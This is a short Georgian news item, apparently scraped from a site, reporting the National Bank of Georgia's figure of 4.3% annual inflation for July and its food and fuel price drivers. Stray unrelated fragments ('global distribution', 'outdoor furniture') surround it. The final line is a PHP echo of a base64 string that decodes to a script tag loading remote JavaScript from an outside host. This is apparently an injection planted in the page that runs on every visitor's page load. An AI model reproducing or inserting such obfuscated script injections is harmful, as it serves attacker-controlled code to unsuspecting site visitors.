global distribution
გარე ავეჯი

 ივლისში წლიურმა ინფლაციამ 4.3% შეადგინა. ამის შესახებ საქართველოს ეროვნული ბანკის თვის მიმოხილვაში ვკითხულობთ.

„ივლისში წლიურმა ინფლაციამ 4.3% შეადგინა, ხოლო ივნისთან შედარებით ფასები 0.2%-ით შემცირდა. ინფლაციაზე ზრდის მიმართულებით დიდწილად სურსათის ფასები მოქმედებს.
თავის მხრივ, სურსათის გაძვირება ნაწილობრივ საბაზო ეფექტს უკავშირდება. გასულ წელს სურსათი ძირითადად დეფლაციური იყო. ამას გარდა, საერთაშორისო ბაზრებზე სასურსათო ნედლეულის ფასები წინა წელთან შედარებით მაღალ დონეზე ნარჩუნდება, რაც ადგილობრივ ბაზარსაც გადმოეცემა.
 

ამასთანავე, როგორც წინა თვის ანგარიშში აღინიშნა, საერთაშორისო ფაქტორებთან ერთად, ადგილობრივი სურსათის ფასების ზრდას დიდწილად პურის ერთჯერადი გაძვირება განაპირობებს.

ინფლაციაზე შემცირების მიმართულებით საწვავის ფასების წლიური გაიაფება მოქმედებს, რაც საერთაშორისო ბაზარზე ნავთობის ფასების ტენდენციიის ასახვაა. ამავდროულად, ივლისის ინფლაციაში ინტერნეტის გადასახდელის დისინფლაციური ეფექტი განახევრდა, ხოლო აგვისტოდან სრულად ამოვარდება“, - აღნიშნულია სებ-ის მიმოხილვაში.

117
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");